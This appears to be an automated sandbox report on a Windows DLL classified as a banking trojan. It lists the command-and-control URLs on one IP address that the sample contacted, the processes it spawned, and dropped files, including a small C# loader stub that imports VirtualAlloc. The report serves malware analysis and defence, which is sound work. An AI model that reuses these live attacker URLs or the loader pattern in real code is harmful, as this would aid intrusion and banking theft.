            http://194.76.226.200/drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk0%Avira URL Cloudsafe
            http://194.76.226.200/drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk0%Avira URL Cloudsafe
            http://194.76.226.200/drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk0%Avira URL Cloudsafe
            http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
            http://194.76.226.200/drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk0%Avira URL Cloudsafe
            http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r20%Avira URL Cloudsafe
            http://194.76.226.200/BFA0%Avira URL Cloudsafe
            http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o0%Avira URL Cloudsafe
            http://194.76.226.200/mA0%Avira URL Cloudsafe
            http://194.76.226.200/M0%Avira URL Cloudsafe
            http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM70%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlktrue
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlktrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://curlmyip.netloaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://194.76.226.200/rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://ipinfo.io/iploaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://constitution.org/usdeclar.txtloaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdregsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQregsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/BFArundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7orundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/mAregsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/Mregsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              194.76.226.200
              		unknownGermany
              		39378SERVINGADEtrue

              Private

              IP
              192.168.2.1

              General Information

              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:560270
              Start date:26.01.2022
              Start time:10:26:42
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 18m 54s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:61f113091fd0c.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:51
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:1
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.bank.troj.evad.winDLL@76/57@0/2
              EGA Information:
              • Successful, ratio: 50%
              HDC Information:
              • Successful, ratio: 20.5% (good quality ratio 19.6%)
              • Quality average: 79.9%
              • Quality standard deviation: 28.3%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 215
              • Number of non-executed functions: 302
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .dll
              • Override analysis time to 240s for rundll32

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 13.107.42.16
              • Excluded domains from analysis (whitelisted): config.edge.skype.com.trafficmanager.net, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
              • Execution Graph export aborted for target mshta.exe, PID 1956 because there are no executed function
              • Execution Graph export aborted for target mshta.exe, PID 5280 because there are no executed function
              • Execution Graph export aborted for target mshta.exe, PID 6092 because there are no executed function
              • Execution Graph export aborted for target mshta.exe, PID 7156 because there are no executed function
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • VT rate limit hit for: 61f113091fd0c.dll

              Simulations

              Behavior and APIs

              TimeTypeDescription
              10:27:46API Interceptor10x Sleep call for process: rundll32.exe modified
              10:27:47API Interceptor5x Sleep call for process: regsvr32.exe modified
              10:27:47API Interceptor6x Sleep call for process: loaddll32.exe modified
              10:28:27API Interceptor150x Sleep call for process: powershell.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):11606
              Entropy (8bit):4.883977562702998
              Encrypted:false
              SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
              MD5:1F1446CE05A385817C3EF20CBD8B6E6A
              SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
              SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
              SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
              Malicious:false
              Reputation:unknown
              Preview:PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

              C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.

              C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.255934415649345
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fNCzxs7+AEszIWXp+N23fNH:p37Lvkmb6KH0WZE8x
              MD5:7EE5D883B6955CCFAE7CAD3FE22CB99B
              SHA1:67C0F50C1230CFC726F1CEA4B70A4834B0B4FCE1
              SHA-256:F52B96F19A2EA70864B64E8E0A2DDD5D8F9136E3764FA942235E70E721878AD4
              SHA-512:5DD034E4A1B0AEB04A674425076D05D489518A4EEE06CA7E81CEC4C1D9DB140744EF0E49974B6E80113A60BB0200387FDCE39EB406799413F59428012AB6D25E
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hsihch1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs"

              C:\Users\user\AppData\Local\Temp\0hsihch1.dll

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.622757174603961
              Encrypted:false
              SSDEEP:48:6LXE7S5FwYXok+2W8JsgWZX1ulxqa3mRq:p7S5ek4pe2K
              MD5:16C2ADA8A386BC091BA2102AA2EAAA8A
              SHA1:CCED25C37AD736241E59EE63B4AD83CEFA795E69
              SHA-256:C2BFD0A629378ED8B80CFFE1EA3CD691F2A15C3FFE3D9495604AC732DCB94BF3
              SHA-512:00848E983DC3B5C5FA11F7D403C2E4F9ADE4C2DBB4DF70D7693E855C62A60D5576932ABCB70A258502B0E3B6B552B9EE9B6350432EF1EB67E7E25F231D474F79
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........

              C:\Users\user\AppData\Local\Temp\0hsihch1.out

              Download File
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.321063231466278
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KH0WZE8UKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHVE8UKaM5DqBVKVrdFAMBJTH
              MD5:307A9BF290A954A780806D0654D542DB
              SHA1:5AFBAC2DAEF8EDD20D557E79BB490DC10026604C
              SHA-256:5ABE22E6476D658788B11406CF28AAF1AE8C35A61504694A202B6D836A535EB4
              SHA-512:84C6CDB87D8955A36765134E3A0B5A21F927C5A46112BBD0628E7D356DA253EF71F41A75BB3528B9C8A99782F0BEF48AD8522DC58279EF0DFD34C245EFA7D147
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\0hsihch1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\0hsihch1.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

              C:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1116314649348857
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry16ak7YnqqOLPN5Dlq5J:+RI+ycuZhNv6akSOLPNnqX
              MD5:4D219614CBA84381F96B83F1027944AC
              SHA1:B1555827904FF1867D12D78853FE3860A13732FE
              SHA-256:A5A109C402C8B0CE26398AD22860F9386E31DAB339D6C44ECD466D5484928202
              SHA-512:E830AE63BF41467AFC236F7C1A5951A668122CF0AE8F8E6361F2B1F64BBD432ED238319844EA3E76CC4D87D92522CCF647A77208ED451ACE468EF2A9F4ED4BBC
              Malicious:false
              Reputation:unknown
              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.q.v.o.g.m.w.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

              C:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP

              Download File
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:MSVC .res
              Category:dropped
              Size (bytes):652
              Entropy (8bit):3.1130536385099568
              Encrypted:false
              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxGak7YnqqaXPN5Dlq5J:+RI+ycuZhNaakSCPNnqX
              MD5:CB71703D29E5D95F33A5CE8E646DAC20
              SHA1:8F2293399F6CF908E6E651F1ADD9BAC2F861BBB6
              SHA-256:4DA97D39F383049194CB544D7720D0742787A66533287D22F8BD837560F06776
              SHA-512:0A29A43362DB781B176263085CBDF98AACCF5E49EAE9F602908AAFE3202E560D5B250E2BE45E9ADE6DAC84A5875A066AC689FCCBA89CEC32619FE8197AEEE910
              Malicious:false
              Reputation:unknown
